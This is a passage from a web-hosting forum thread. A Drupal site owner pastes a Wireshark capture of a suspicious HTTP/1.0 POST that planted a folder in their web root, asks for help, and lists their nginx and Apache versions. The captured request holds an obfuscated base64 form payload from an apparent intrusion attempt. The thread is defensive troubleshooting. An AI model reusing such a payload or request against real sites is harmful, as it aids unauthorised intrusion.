.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
Total Length: 566
Identification: 0x6476 (25718)
Flags: 0x40, Don't fragment
Fragment Offset: 0
Time to Live: 53
Protocol: TCP (6)
Header Checksum: 0xb79e [validation disabled]
[Header checksum status: Unverified]
Source Address: 67.213.82.137
Destination Address: MYIP
Transmission Control Protocol, Src Port: 58882, Dst Port: 80, Seq: 60, Ack: 1, Len: 514
Source Port: 58882
Destination Port: 80
[Stream index: 21961]
[TCP Segment Len: 514]
Sequence Number: 60 (relative sequence number)
Sequence Number (raw): 418382583
[Next Sequence Number: 574 (relative sequence number)]
Acknowledgment Number: 1 (relative ack number)
Acknowledgment number (raw): 3179666920
1000 .... = Header Length: 32 bytes (8)
Flags: 0x018 (PSH, ACK)
000. .... .... = Reserved: Not set
...0 .... .... = Nonce: Not set
.... 0... .... = Congestion Window Reduced (CWR): Not set
.... .0.. .... = ECN-Echo: Not set
.... ..0. .... = Urgent: Not set
.... ...1 .... = Acknowledgment: Set
.... .... 1... = Push: Set
.... .... .0.. = Reset: Not set
.... .... ..0. = Syn: Not set
.... .... ...0 = Fin: Not set
[TCP Flags: ·······AP···]
Window: 115
[Calculated window size: 14720]
[Window size scaling factor: 128]
Checksum: 0x2d9d [unverified]
[Checksum Status: Unverified]
Urgent Pointer: 0
Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
TCP Option - No-Operation (NOP)
Kind: No-Operation (1)
TCP Option - No-Operation (NOP)
Kind: No-Operation (1)
TCP Option - Timestamps: TSval 3477825447, TSecr 43015397
Kind: Time Stamp Option (8)
Length: 10
Timestamp value: 3477825447
Timestamp echo reply: 43015397
[SEQ/ACK analysis]
[iRTT: 0.111636000 seconds]
[Bytes in flight: 514]
[Bytes sent since last PSH flag: 514]
[Timestamps]
[Time since first frame in this TCP stream: 0.223157000 seconds]
[Time since previous frame in this TCP stream: 0.110851000 seconds]
TCP payload (514 bytes)
TCP segment data (514 bytes)
[2 Reassembled TCP Segments (573 bytes): #1646719(59), #1646723(514)]
[Frame: 1646719, payload: 0-58 (59 bytes)]
[Frame: 1646723, payload: 59-572 (514 bytes)]
[Segment count: 2]
[Reassembled TCP length: 573]
[Reassembled TCP Data: 504f5354202f61706963686174706f6e672d776565726173657468616b756c2d65657475…]
Hypertext Transfer Protocol
POST /apichatpong-weerasethakul-eetuva/index.php HTTP/1.0\r\n
Host: www.mydomain.com\r\n
Connection: close\r\n
Referer: http://www.mydomain.com/apichatpong-wee ... ex.php\r\n
Content-Length: 151\r\n
[Content length: 151]
Content-Type: application/x-www-form-urlencoded\r\n
Accept-Language: en-US,en;q=0.8\r\n
User-Agent: Mozilla/5.0 (iPad; CPU OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1\r\n
\r\n
[Full request URI: http://www.mydomain.com/apichatpong-wee ... /index.php]
[HTTP request 1/1]
[Response in frame: 1646725]
File Data: 151 bytes
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "nqxbpe" = "NnxyPGpzbHdvdSV1MC8jbCshJysgIWMpJSU5YWJtZC5jdyV0bDV7MysiNS4wNC91MC8jZishIi9taGdybyEheChgb3AgYXxhenN1NHQtN3A0MWliPG19eSNlIHwuYSwtZXEvaTNsKw=="
Key: nqxbpe
Value: NnxyPGpzbHdvdSV1MC8jbCshJysgIWMpJSU5YWJtZC5jdyV0bDV7MysiNS4wNC91MC8jZishIi9taGdybyEheChgb3AgYXxhenN1NHQtN3A0MWliPG19eSNlIHwuYSwtZXEvaTNsKw==
The problem is that now in my public_html I have a folder "apichatpong-weerasethakul-eetuva".
Any idea how to solve this problem?
Regards
D
Re: Attack
Do you use WordPress?
Re: Attack
Dear,
No, I'm using Drupal 7.78, but I don't think it's a CMS problem; I think it's a web server problem. I'm using nginx as the frontend and Apache as the backend.
My nginx:
https://www.sans.org/blog/http-request- ... e-proxies/
There is a misconfiguration in my web server: I can't disable HTTP/1.0, and the attack uses HTTP/1.0.
Any idea how to solve the problem?
Regards
No, I'm using Drupal 7.78, but I don't think it's a CMS problem; I think it's a web server problem. I'm using nginx as the frontend and Apache as the backend.
My nginx:
My apache:nginx version: nginx/1.16.0
built by gcc 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4)
built with OpenSSL 1.1.0j 20 Nov 2018
TLS SNI support enabled
Maybe this is my problem:Server version: Apache/2.4.7 (Ubuntu)
Server built: Apr 3 2019 18:04:25
https://www.sans.org/blog/http-request- ... e-proxies/
There is a misconfiguration in my web server: I can't disable HTTP/1.0, and the attack uses HTTP/1.0.
Any idea how to solve the problem?
Regards